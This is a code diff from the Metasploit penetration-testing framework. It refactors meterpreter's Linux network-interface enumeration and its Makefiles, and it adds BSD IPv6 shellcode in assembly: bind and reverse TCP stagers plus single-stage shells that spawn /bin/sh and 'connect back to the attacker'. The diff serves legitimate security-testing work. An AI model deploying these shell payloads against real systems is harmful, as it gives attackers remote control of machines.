+ ifc.ifc_len = sizeof(buf);
+ ifc.ifc_buf = buf;
+ if(ioctl(sck, SIOCGIFCONF, &ifc) < 0) {
+ dprintf("ioctl SIOCGIFCONF: %d: %s", errno, strerror(errno));
+ result = errno;
+ goto fail;
+ }
+
+ /* Iterate through the list of interfaces. */
+ ifr = ifc.ifc_req;
+ num_ifaces = ifc.ifc_len / sizeof(struct ifreq);
+ *ifaces = calloc(num_ifaces, sizeof(struct iface));
+
+ *count = num_ifaces;
+
+ for (i = 0; i < num_ifaces; i++) {
+ struct ifreq *item = &ifr[i];
+ struct sockaddr *addr = &(item->ifr_addr);
+ unsigned int addr_size;
+ struct iface *iface = &(*ifaces)[i];
+
+ iface->name = malloc(strlen(item->ifr_name)+1);
+ memcpy(iface->name, item->ifr_name, strlen(item->ifr_name)+1);
+
+ /*
+ * SIOCGIFCONF will have gotten the name and ip addr, store them
+ */
+ switch (addr->sa_family) {
+ case AF_INET:
+ addr_size = 4;
+ iface->addr = malloc(addr_size);
+ memcpy(iface->addr, &(((struct sockaddr_in*)addr)->sin_addr), addr_size);
+ break;
+ case AF_INET6:
+ addr_size = 16;
+ iface->addr = malloc(addr_size);
+ memcpy(iface->addr, &(((struct sockaddr_in6*)addr)->sin6_addr), addr_size);
+ break;
+ default:
+ /* We don't know how to display this thing, it doesn't have an
+ * address, give up. This will likely result in bogus info in
+ * uninitialized memory being used for the remainder of the
+ * list.
+ *
+ * XXX Should we free this one and try to continue with the rest?
+ */
+ result = ENOTSUP;
+ goto fail;
+ }
+ iface->addr_size = addr_size;
+
+ /* Get the MAC address */
+ if(ioctl(sck, SIOCGIFHWADDR, item) < 0) {
+ dprintf("ioctl SIOCGIFHWADDR: %d: %s", errno, strerror(errno));
+ result = errno;
break;
}
+ iface->hwaddr = malloc(6);
+ memcpy(iface->hwaddr, &(item->ifr_hwaddr.sa_data), 6);
- memcpy(mac, ifr.ifr_hwaddr.sa_data, 6);
- result = 0;
- } while(0);
+ /* Get the netmask */
+ if(ioctl(sck, SIOCGIFNETMASK, item) < 0) {
+ dprintf("ioctl SIOCGIFNETMASK: %d: %s", errno, strerror(errno));
+ result = errno;
+ break;
+ }
+ iface->netmask = malloc(addr_size);
+ switch (addr->sa_family) {
+ case AF_INET:
+ memcpy(iface->netmask, &((struct sockaddr_in*)&(item->ifr_netmask))->sin_addr, addr_size);
+ break;
+ case AF_INET6:
+ memcpy(iface->netmask, &((struct sockaddr_in6*)&(item->ifr_netmask))->sin6_addr, addr_size);
+ break;
+ }
+
+ }
- if(fd != -1) close(fd);
+ return 0;
+fail:
return result;
}
+/*
+ * mainly for debugging
+ */
+char *get_ip_str(const struct sockaddr *sa, char *s, size_t maxlen)
+{
+ switch(sa->sa_family) {
+ case AF_INET:
+ inet_ntop(AF_INET, &(((struct sockaddr_in *)sa)->sin_addr),
+ s, maxlen);
+ break;
+
+ case AF_INET6:
+ inet_ntop(AF_INET6, &(((struct sockaddr_in6 *)sa)->sin6_addr),
+ s, maxlen);
+ break;
+
+ default:
+ strncpy(s, "Unknown AF", maxlen);
+ return NULL;
+ }
+
+ return s;
+}
+
#endif
/*
@@ -116,94 +261,49 @@ DWORD request_net_config_get_interfaces(Remote *remote, Packet *packet)
free(table);
#else
- Tlv entries[5]; // xxx, we can probably support more. ip aliases, etc.
- char errbuf[PCAP_ERRBUF_SIZE+4];
- pcap_if_t *interfaces, *iter;
- pcap_addr_t *addresses;
- unsigned char mac[6];
-
- interfaces = iter = NULL;
-
- memset(entries, 0, sizeof(entries));
-
- do {
- if(pcap_findalldevs(&interfaces, errbuf) == -1) {
- result = ENOMEM; // xxx, send errbuf to remote
- break;
- }
-
- for(iter = interfaces; iter != NULL ; iter = iter->next ) {
- entryCount = 0;
-
- if(strcmp(iter->name, "any") == 0) continue;
-
- dprintf("[%s] Processing %s", __FUNCTION__, iter->name);
-
- entries[entryCount].header.length = strlen(iter->name)+1;
- entries[entryCount].header.type = TLV_TYPE_MAC_NAME;
- entries[entryCount].buffer = (PUCHAR)iter->name;
- entryCount++;
-
- for(addresses = iter->addresses ; addresses != NULL ; addresses = addresses->next) {
- struct sockaddr_in *sin;
-
- dprintf("[%s/%s] addr = %p, netmask = %p, broadaddr = %p, dstaddr = %p", __FUNCTION__, iter->name);
- dprintf("[%s/%s] addresses->addr.sa_family = %d", __FUNCTION__, iter->name, addresses->addr->sa_family);
-
- if(addresses->addr == NULL) {
- dprintf("[%s/%s] addresses->addr = NULL ?", __FUNCTION__, iter->name);
- break;
- }
-
- if(addresses->addr->sa_family == AF_INET) {
- sin = (struct sockaddr_in *)(addresses->addr);
-
- entries[entryCount].header.length = sizeof(DWORD);
- entries[entryCount].header.type = TLV_TYPE_IP;
- entries[entryCount].buffer = (PUCHAR)&sin->sin_addr.s_addr;
- entryCount++;
-
- if(addresses->netmask) {
- sin = (struct sockaddr_in *)(addresses->netmask);
- entries[entryCount].header.length = sizeof(DWORD);
- entries[entryCount].header.type = TLV_TYPE_NETMASK;
- entries[entryCount].buffer = (PUCHAR)&sin->sin_addr.s_addr;
- entryCount++;
- }
-
-
-
- break;
- }
-
- }
-
- get_interface_mac_addr(iter->name, mac);
-
- entries[entryCount].header.length = 6;
- entries[entryCount].header.type = TLV_TYPE_MAC_ADDR;
- entries[entryCount].buffer = (PUCHAR)(mac);
- entryCount++;
+ struct iface *ifaces;
+ int count;
+ int i;
+ int if_error;
+ Tlv entries[4];
+
+ if_error = get_ifaces(&ifaces, &count);
+
+ if (if_error) {
+ result = if_error;
+ } else {
+ for (i = 0; i < count; i++) {
+
+ entries[0].header.length = strlen(ifaces[i].name)+1;
+ entries[0].header.type = TLV_TYPE_MAC_NAME;
+ entries[0].buffer = (PUCHAR)ifaces[i].name;
+
+ entries[1].header.length = 6;
+ entries[1].header.type = TLV_TYPE_MAC_ADDR;
+ entries[1].buffer = (PUCHAR)ifaces[i].hwaddr;
+
+ entries[2].header.length = ifaces[i].addr_size;
+ entries[2].header.type = TLV_TYPE_IP;
+ entries[2].buffer = (PUCHAR)ifaces[i].addr;
+
+ entries[3].header.length = ifaces[i].addr_size;
+ entries[3].header.type = TLV_TYPE_NETMASK;
+ entries[3].buffer = (PUCHAR)ifaces[i].netmask;
-
- dprintf("[%s] adding response with %d entries", __FUNCTION__, entryCount);
- packet_add_tlv_group(response, TLV_TYPE_NETWORK_INTERFACE, entries, entryCount);
- dprintf("[%s] done with adding", __FUNCTION__);
+ packet_add_tlv_group(response, TLV_TYPE_NETWORK_INTERFACE, entries, 4);
}
-
- } while(0);
-
- if(interfaces) {
- dprintf("[%s] calling pcap_freealldevs()", __FUNCTION__);
- pcap_freealldevs(interfaces);
}
- dprintf("[%s] and done!", __FUNCTION__);
-
+ if (ifaces)
+ free_ifaces(ifaces, count);
#endif
// Transmit the response if valid
packet_transmit_response(result, remote, response);
return result;
}
+
+
+
+
View
2 external/source/meterpreter/source/server/linux/netlink.c
@@ -144,7 +144,7 @@ int netlink_parse(int fd, int seq, netlink_cb_t callback, void *data)
if(nh->nlmsg_type == NLMSG_ERROR) {
struct nlmsgerr *me = (struct nlmsgerr *) NLMSG_DATA (nh);
- dprintf("[%s] in NLMSG_ERROR handling.. me = %p", __FUNCTION__);
+ dprintf("[%s] in NLMSG_ERROR handling.. me = %p", __FUNCTION__, me);
dprintf("[%s] me->error = %d", __FUNCTION__, me->error);
if(me->error) {
dprintf("[%s] so, we have: nlmsg_len: %d, nlmsg_type: %d, nlmsg_flags: %d, nlmsg_seq: %d, nlmsg_pid: %d",
View
71 external/source/meterpreter/source/server/rtld/Makefile
@@ -1,66 +1,61 @@
-CFLAGS=-I${PWD}/hack
+CFLAGS+=-I${PWD}/hack
CFLAGS+= -I ../../bionic/libc/include -I ../../bionic/libc/kernel/common/linux/ -I ../../bionic/libc/kernel/common/ -I ../../bionic/libc/arch-x86/include/
CFLAGS+= -I ../../bionic/libc/kernel/arch-x86/ -I../../source/server/elf/headers -I../../bionic/libc/private -fPIC -DPIC
CFLAGS+= -nostdinc -nostdlib -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -DANDROID_X86_LINKER
-#CFLAGS+= -ggdb
CFLAGS+= -DMETSRV_RTLD -D_BYTE_ORDER=_LITTLE_ENDIAN
CFLAGS+= -march=i386 -m32
OBJ=msflinker.o basic_libc.o syscall.o linker_format.o dlfcn.o zlib.o metsrv_rtld.o
-all: msflinker msflinker.bin rtldtest
-
-msflinker: $(OBJ)
- gcc -Wl,-script=script -Wl,--hash-style=sysv $(CFLAGS) -o msflinker $(OBJ) -lgcc
- strip msflinker
-
-msflinker.bin: msflinker elf2bin.c
- gcc -march=i386 -m32 -o elf2bin elf2bin.c
- ./elf2bin msflinker msflinker.bin
+compiled=../../bionic/compiled
-libc.h: ../../bionic/compiled/libc.so
- strip --strip-debug ../../bionic/compiled/libc.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libc.so libc
+# These are all generated from their .so counterparts below
+HEADERS=libc.h \
+ libm.h \
+ libcrypto.h \
+ libssl.h \
+ libsupport.h \
+ libmetsrv_main.h \
+ libpcap.h
-libm.h: ../../bionic/compiled/libm.so
- strip --strip-debug ../../bionic/compiled/libm.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libm.so libm
-libcrypto.h: ../../bionic/compiled/libcrypto.so
- strip --strip-debug ../../bionic/compiled/libcrypto.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libcrypto.so libcrypto
+all: msflinker msflinker.bin rtldtest
-libssl.h: ../../bionic/compiled/libssl.so
- strip --strip-debug ../../bionic/compiled/libssl.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libssl.so libssl
+debug: DEBUG=true
+debug: CFLAGS+=-ggdb
+debug: all
-libsupport.h: ../../bionic/compiled/libsupport.so
- strip --strip-debug ../../bionic/compiled/libsupport.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libsupport.so libsupport
+%.h: $(compiled)/%.so
+ [ "$(DEBUG)" != "true" ] && strip --strip-debug $<
+ (export SO=$<; perl ../../../tools/so2h.pl $< $$(basename $${SO%.so}))
-libmetsrv_main.h: ../../bionic/compiled/libmetsrv_main.so
- strip --strip-debug ../../bionic/compiled/libmetsrv_main.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libmetsrv_main.so libmetsrv_main
+msflinker: $(OBJ)
+ $(CC) -Wl,-script=script -Wl,--hash-style=sysv $(CFLAGS) -o msflinker $(OBJ) -lgcc
+ [ "$(DEBUG)" != "true" ] && strip $@
-libpcap.h: ../../bionic/compiled/libpcap.so
- strip --strip-debug ../../bionic/compiled/libpcap.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libpcap.so libpcap
+# elf2bin only has to run on the build machine, don't bother with CFLAGS
+msflinker.bin: msflinker elf2bin.c
+ $(CC) -march=i386 -m32 -o elf2bin elf2bin.c
+ ./elf2bin msflinker msflinker.bin
-metsrv_rtld.o: libc.h libm.h libcrypto.h libssl.h libmetsrv_main.h libsupport.h libpcap.h
+metsrv_rtld.o: $(HEADERS)
rtldtest: rtldtest.c msflinker
- gcc -march=i386 -m32 -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'`
+ $(CC) -march=i386 -m32 -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'`
-.s.o:
- gcc $(CFLAGS) -c $<
+.S.o:
+ $(CC) $(CFLAGS) -c $<
.c.o:
- gcc $(CFLAGS) -c $<
+ $(CC) $(CFLAGS) -c $<
clean:
- rm -f libmetsrv_main.h libssl.h libcrypto.h libm.h libc.h libsupport.h
+ rm -f $(HEADERS)
rm -f *.o
rm -f msflinker msflinker.bin msflinker.so
rm -f rtldtest elf2bin
+
+.PHONY: clean
+
View
2 external/source/meterpreter/source/server/rtld/metsrv_rtld.c
@@ -224,7 +224,7 @@ int dlsocket(void *libc)
fd = libc_socket(AF_INET, SOCK_STREAM, 0);
if(fd == -1) break;
- sin.sin_addr.s_addr = libc_inet_addr("127.0.0.1");
+ sin.sin_addr.s_addr = libc_inet_addr("127.1.1.1");
sin.sin_port = htons(4444);
sin.sin_family = AF_INET;
View
2 external/source/meterpreter/source/server/server_setup.c
@@ -133,7 +133,7 @@ static VOID server_socket_flush( Remote * remote )
break;
ret = recv(fd, buff, sizeof(buff), 0);
- dprintf("[SERVER] Flushed %d bytes from the buffer");
+ dprintf("[SERVER] Flushed %d bytes from the buffer", ret);
// The socket closed while we waited
if(ret == 0) {
View
4 external/source/meterpreter/workspace/common/Makefile
@@ -55,6 +55,10 @@ CFLAGS+= -I$(ARCHVPATH)
all: libsupport.so
+debug: CFLAGS+=-ggdb
+debug: all
+
+
libsupport.so: $(objects)
# Specify that we only want sysv aka DT_HASH hash tables, not DT_GNU_HASH,
# because that's what msflinker (modified bionic linker) can handle
View
5 external/source/meterpreter/workspace/ext_posix_sample/Makefile
@@ -11,7 +11,7 @@ CFLAGS+= -I ../../source/bionic/libc/include -I ../../source/bionic/libc/kernel/
CFLAGS+= -I ../../source/bionic/libc/kernel/arch-x86/
CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
+CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/stdapi/server -lc -lsupport
@@ -21,6 +21,9 @@ objects = test.o
all: posix_sample.so
+debug: CFLAGS+=-ggdb
+debug: all
+
posix_sample.so: test.o
gcc -shared $(CFLAGS) -o $@ $(objects)
View
22 external/source/meterpreter/workspace/ext_server_networkpug/Makefile
@@ -1,22 +1,22 @@
VPATH=../../source/extensions/networkpug
-OPENSSL=${PWD}/../../source/openssl/include
-COMMON=${PWD}/../../source/common
+OPENSSL=../../source/openssl/include
+COMMON=../../source/common
SERVER=../../source/server
PCAP=../../source/libpcap
+LIBC=../../source/bionic/libc
-CFLAGS=-fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall
+CFLAGS=-nostdinc -nostdlib -fPIC -DPIC -Wall
CFLAGS+=-D_UNIX -D__linux__
-CFLAGS+=-I${COMMON} -I${SERVER} -I${OPENSSL} -I${PCAP}
-CFLAGS+= -I ../../source/bionic/libc/include -I ../../source/bionic/libc/kernel/common/linux/ -I ../../source/bionic/libc/kernel/common/ -I ../../source/bionic/libc/arch-x86/include/
-CFLAGS+= -I ../../source/bionic/libc/kernel/arch-x86/
+CFLAGS+=-I$(COMMON) -I$(SERVER) -I$(OPENSSL) -I$(PCAP)
+CFLAGS+= -I$(LIBC)/include -I$(LIBC)/kernel/common/linux/ -I$(LIBC)/kernel/common/ -I$(LIBC)/arch-x86/include/
+CFLAGS+= -I$(LIBC)/kernel/arch-x86/
CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
-CFLAGS+= -fPIC -Os
+CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -I../../source/extensions/networkpug -lc -lpcap -lsupport -lmetsrv_main
-CFLAGS+= -march=i386 -m32
+CFLAGS+= -march=i386 -m32 -Os
#LDFLAGS= -fPIC -Bshareable -lc
@@ -31,11 +31,13 @@ objects = networkpug.o
all: ext_server_networkpug.so
+debug: CFLAGS+= -ggdb
+debug: all
ext_server_networkpug.so: $(objects)
$(CC) -Wl,--hash-style=sysv -shared $(CFLAGS) $(objects) -o $@
-.PHONY: clean
+.PHONY: clean debug
clean:
rm -f *.o *.so *~; rm -f $(objects)
View
8 external/source/meterpreter/workspace/ext_server_sniffer/Makefile
@@ -12,7 +12,7 @@ CFLAGS+= -I ../../source/bionic/libc/include -I ../../source/bionic/libc/kernel/
CFLAGS+= -I ../../source/bionic/libc/kernel/arch-x86/
CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
+CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/networkpug -lc -lpcap -lsupport -lmetsrv_main
CFLAGS+= -I.
@@ -24,9 +24,13 @@ objects = sniffer.o
all: ext_server_sniffer.so
+debug: CFLAGS+= -ggdb
+debug: all
+
+
ext_server_sniffer.so: $(objects)
$(CC) -Wl,--hash-style=sysv -shared $(CFLAGS) $(objects) -lpcap -lssl -o $@
-.PHONY: clean
+.PHONY: clean debug
clean:
rm -f *.o *.so *~; rm -f $(objects)
View
26 external/source/meterpreter/workspace/ext_server_stdapi/Makefile
@@ -4,18 +4,17 @@ OPENSSL=../../source/openssl/include
COMMON=../../source/common
SERVER=../../source/server
-CFLAGS=-fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall
+CFLAGS=-fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -Wall
CFLAGS+=-D_UNIX -D__linux__
CFLAGS+=-I${COMMON} -I${SERVER} -I${OPENSSL}
CFLAGS+= -I ../../source/bionic/libc/include -I ../../source/bionic/libc/kernel/common/linux/ -I ../../source/bionic/libc/kernel/common/ -I ../../source/bionic/libc/arch-x86/include/
CFLAGS+= -I ../../source/bionic/libc/kernel/arch-x86/ -I../../source/libpcap
CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
-CFLAGS+= -fPIC -Os
+CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -I../../source/extensions/stdapi/server -lc -lsupport -lmetsrv_main -lpcap
-CFLAGS+= -march=i386 -m32
+CFLAGS+= -march=i386 -m32 -Os
#LDFLAGS= -fPIC -Bshareable -lc
@@ -26,21 +25,30 @@ else
CFLAGS+= -fno-stack-protector -D__linux__
endif
-objects = server/general.o server/stdapi.o server/fs/dir.o server/fs/file.o \
+objects = \
+ server/fs/dir.o \
+ server/fs/file.o \
server/fs/fs_util.o \
- server/net/socket/tcp.o server/net/socket/tcp_server.o server/net/socket/udp.o \
- server/sys/config/config.o server/sys/process/process.o server/sys/process/linux-in-mem-exe.o \
+ server/general.o \
server/net/config/interface.o \
server/net/config/route.o \
-
+ server/net/socket/tcp.o \
+ server/net/socket/tcp_server.o \
+ server/net/socket/udp.o \
+ server/stdapi.o \
+ server/sys/config/config.o \
+ server/sys/process/linux-in-mem-exe.o \
+ server/sys/process/process.o \
all: ext_server_stdapi.so
+debug: CFLAGS+=-ggdb
+debug: all
ext_server_stdapi.so: $(objects)
$(CC) -Wl,--hash-style=sysv -shared $(CFLAGS) $(objects) -lpcap -lcrypto -o $@
-.PHONY: clean
+.PHONY: clean debug
clean:
rm -f *.o *.so *~; rm -f $(objects)
View
5 external/source/meterpreter/workspace/metsrv/Makefile
@@ -11,7 +11,7 @@ CFLAGS+= -I ../../source/bionic/libc/include -I ../../source/bionic/libc/kernel/
CFLAGS+= -I ../../source/bionic/libc/kernel/arch-x86/
CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
+CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -march=i386 -m32
@@ -25,6 +25,9 @@ objects+= server_setup.o remote_dispatch_common.o remote_dispatch.o netlink.o
all: libmetsrv_main.so
+debug: CFLAGS+=-ggdb
+debug: all
+
libmetsrv_main.so: $(objects)
$(CC) -Wl,--hash-style=sysv -shared $(CFLAGS) -o $@ $(objects) -export-dynamic -lc -lcrypto -lssl -lgcc -ldl -lsupport
View
5 external/source/shellcode/Makefile.incl
@@ -1,2 +1,3 @@
-BUILDASM=do echo -n "Building $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && ld $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
-BUILDASMBSD=do echo -n "Building $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && gcc $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
+BUILDASM=do echo -n "Building (ASM) $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && ld $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
+
+BUILDASMBSD=do echo -n "Building (BSDASM) $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && gcc $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
View
4 external/source/shellcode/bsd/ia32/Makefile
@@ -1,7 +1,7 @@
ASM=nasm
-STAGERS=stager_sock_bind stager_sock_find stager_sock_reverse
+STAGERS=stager_sock_bind stager_sock_bind_ipv6 stager_sock_find stager_sock_reverse stager_sock_reverse_ipv6
STAGES=stage_tcp_shell
-SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock
+SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock single_reverse_tcp_shell_ipv6 single_bind_tcp_shell_ipv6
OBJS=${STAGERS} ${STAGES} ${SINGLE}
include ../../Makefile.incl
View
36 external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm
@@ -0,0 +1,36 @@
+;;
+;
+; Name: single_bind_tcp_shell
+; Version: $Revision: 1628 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Single portbind TCP shell.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Bind TCP Shell
+; meta-description=Listen on a port and spawn a shell
+; meta-authors=skape <mmiller [at] hick.org>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=single
+; meta-connection-type=bind
+; meta-name=bind_tcp_shell
+; meta-basemod=Msf::PayloadComponent::BindConnection
+; meta-offset-lport=0x8
+;;
+BITS 32
+
+%define USE_SINGLE_STAGE 1
+
+%include "generic.asm"
+%include "stager_sock_bind_ipv6.asm"
+
+shell:
+ execve_binsh EXECUTE_REDIRECT_IO
View
42 external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm
@@ -0,0 +1,42 @@
+;;
+;
+; Name: single_reverse_tcp_shell
+; Version: $Revision: 1626 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Single reverse TCP shell.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Reverse TCP Shell
+; meta-description=Connect back to the attacker and spawn a shell
+; meta-authors=skape <mmiller [at] hick.org>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=single
+; meta-connection-type=reverse
+; meta-name=reverse_tcp_shell
+; meta-basemod=Msf::PayloadComponent::ReverseConnection
+; meta-offset-lhost=0x0a
+; meta-offset-lport=0x13
+;;
+BITS 32
+
+%define USE_SINGLE_STAGE 1
+%define ASSUME_REG_EAX 0
+
+; If you're on FreeBSD you can assume the state of edx to be 2, but NetBSD
+; clears edx.
+; %define ASSUME_REG_EDX 2
+
+%include "stager_sock_reverse_ipv6.asm"
+%include "generic.asm"
+
+shell:
+ execve_binsh EXECUTE_REDIRECT_IO
View
108 external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm
@@ -0,0 +1,108 @@
+;;
+;
+; Name: stager_sock_bind_ipv6
+; Qualities: Can Have Nulls
+; Version: $Revision: 1628 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Implementation of a BSD portbind over IPv6 TCP stager.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Bind TCP Stager
+; meta-description=Listen on a port for a connection and run a second stage
+; meta-authors=skape <mmiller [at] hick.org>, vlad902 <vlad902 [at] gmail.com>, hdm <hdm [at] metasploit.com>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=stager
+; meta-connection-type=bind
+; meta-name=bind_tcp_ipv6
+; meta-basemod=Msf::PayloadComponent::BindConnection
+; meta-offset-lport=26
+;;
+BITS 32
+GLOBAL main
+
+main:
+
+socket:
+ xor eax, eax
+ push eax ; Protocol: (IP=0)
+ inc eax
+ push eax ; Type: (SOCK_STREAM=1)
+ push byte 28 ; Domain: (PF_INET6=28)
+ push byte 97
+ pop eax ; socket()
+ push eax ; padding
+ int 0x80
+ mov ebx, eax ; save socket
+
+ xor edx, edx
+
+ push edx ; uint32_t sin6_scope_id; /* scope zone index */
+ push edx ; struct in6_addr sin6_addr; /* IP6 address */
+ push edx
+ push edx
+ push edx
+ push edx ; uint32_t sin6_flowinfo; /* IP6 flow information */
+ push dword 0xbfbf1c1c
+ ; in_port_t sin6_port; /* Transport layer port # */
+ ; uint8_t sin6_len; /* length of this struct */
+ ; sa_family_t sin6_family; /* AF_INET6 */
+
+ mov ecx, esp
+
+bind:
+ push byte 28
+ push ecx
+ push eax
+ push byte 104
+ pop eax
+ push eax ; padding
+ int 0x80
+
+listen:
+ mov al, 106
+ int 0x80
+
+accept:
+ push edx
+ push ebx
+%ifndef USE_SINGLE_STAGE
+ mov dh, 0x10
+%endif
+ push edx
+ mov al, 30
+ int 0x80
+
+%ifndef USE_SINGLE_STAGE
+
+read:
+ push ecx
+ push eax
+ push ecx
+%ifdef FD_REG_EBX
+ xchg eax, ebx
+%else
+ xchg eax, edi
+%endif
+ push byte 0x3
+ pop eax
+ int 0x80
+ ret
+
+%else
+
+%ifdef FD_REG_EBX
+ xchg eax, ebx
+%else
+ xchg eax, edi
+%endif
+
+%endif
View
112 external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm
@@ -0,0 +1,112 @@
+;;
+;
+; Name: stager_sock_reverse_ipv6
+; Qualities: Can Have Nulls
+; Version: $Revision: 1626 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Implementation of a BSD reverse TCP stager over IPv6
+;
+; File descriptor in edi.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Reverse TCP Stager
+; meta-description=Connect back to the framework and run a second stage
+; meta-authors=skape <mmiller [at] hick.org>, vlad902 <vlad902 [at] gmail.com>, hdm <hdm [at] metasploit.com>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=stager
+; meta-connection-type=reverse
+; meta-name=reverse_tcp_ipv6
+; meta-basemod=Msf::PayloadComponent::ReverseConnection
+; meta-offset-lhost=43
+; meta-offset-lport=36
+; meta-offset-scope=59
+;;
+BITS 32
+GLOBAL main
+
+main:
+
+socket:
+
+ xor eax, eax
+ push eax ; Protocol: (IP=0)
+ inc eax
+ push eax ; Type: (SOCK_STREAM=1)
+ push byte 28 ; Domain: (PF_INET6=28)
+
+ push byte 97
+ pop eax ; socket()
+ push eax ; padding
+ int 0x80
+ jmp short bounce_to_connect
+
+connect:
+ pop ecx
+ push byte 28
+ push ecx
+ push eax
+
+%ifdef FD_REG_EBX
+ xchg eax, ebx
+%else
+ xchg eax, edi
+%endif
+
+ push byte 98
+ pop eax
+ push eax ; padding
+ int 0x80
+
+ jmp short skip_bounce
+
+bounce_to_connect:
+ call connect
+
+ipv6_address:
+ db 28 ; uint8_t sin6_len; /* length of this struct */
+ db 28 ; sa_family_t sin6_family; /* AF_INET6 */
+ dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */
+ dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */
+ dd 0 ; struct in6_addr sin6_addr; /* IP6 address */
+ dd 0
+ dd 0
+ dd 0x01000000 ; default to ::1
+ dd 0 ; uint32_t sin6_scope_id; /* scope zone index */
+
+skip_bounce:
+
+%ifndef USE_SINGLE_STAGE
+
+read:
+ push byte 0x10
+ pop edx
+ shl edx, 8
+ sub esp, edx
+ mov ecx, esp ; Points to 4096 stack buffer
+
+ push edx ; Length
+ push ecx ; Buffer
+
+%ifdef FD_REG_EBX
+ push ebx ; Socket
+%else
+ push edi ; Socket
+%endif
+
+ push ecx ; Buffer to Return
+
+ mov al, 0x3
+ int 0x80 ; read(socket, &buff, 4096)
+
+ ret ; Return
+
+%endif
View
50 lib/fastlib.rb
@@ -37,7 +37,7 @@
#
class FastLib
- VERSION = "0.0.6"
+ VERSION = "0.0.8"
